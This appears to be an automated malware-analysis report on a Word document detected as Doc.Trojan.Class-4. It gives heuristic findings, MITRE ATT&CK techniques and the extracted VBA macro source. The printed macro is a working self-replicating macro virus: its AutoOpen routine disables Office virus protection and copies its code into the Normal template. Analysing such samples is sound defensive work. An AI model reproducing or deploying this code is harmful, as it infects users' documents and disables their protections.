MALICIOUS
256
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a malicious Word document containing VBA macros, specifically triggering AutoOpen and Auto_Close heuristics. The script attempts to overwrite the Normal.dot template by exporting the current document's VBA components to 'c:\windows\class.sys' and then importing it back into the Normal.dot template. This technique is often used to establish persistence or facilitate the execution of further malicious code.
Heuristics 6
-
ClamAV: Doc.Trojan.Class-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Class-4
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Host.codemodule.replaceline 3, "Sub AutoClose()" -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1364 bytes |
SHA-256: 09963e3fa4597ddbc526c5e24d51adc7b1ddbc47cbb3becc1824607b58e92035 |
|||
|
Detection
ClamAV:
Doc.Trojan.Class-4
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'$$0000005
Const SluzhFile = "c:\windows\class.sys"
Sub AutoOpen()
On Error GoTo out
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
ad = Val(Right(Trim(ActiveDocument.VBProject.VBComponents.Item(1).codemodule.Lines(1, 1)), 7))
nt = Val(Right(Trim(NormalTemplate.VBProject.VBComponents.Item(1).codemodule.Lines(1, 1)), 7))
If nt = 0 Or nt < ad Then
Set Host = NormalTemplate.VBProject.VBComponents.Item(1)
ActiveDocument.VBProject.VBComponents.Item(1).export SluzhFile
Else
If ad = 0 Or ad < nt Then Set Host = ActiveDocument.VBProject.VBComponents.Item(1) Else GoTo out
End If
While Host.codemodule.CountOfLines > 0
Host.codemodule.deletelines 1
Wend
Host.codemodule.AddFromFile (SluzhFile)
For x = 1 To 4
Host.codemodule.deletelines 1
Next x
If nt = 0 Or nt < ad Then
Host.codemodule.replaceline 3, "Sub AutoClose()"
Host.codemodule.replaceline 29, "Sub ToolsMacro()"
End If
out:
End Sub
Sub ViewVBCode()
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.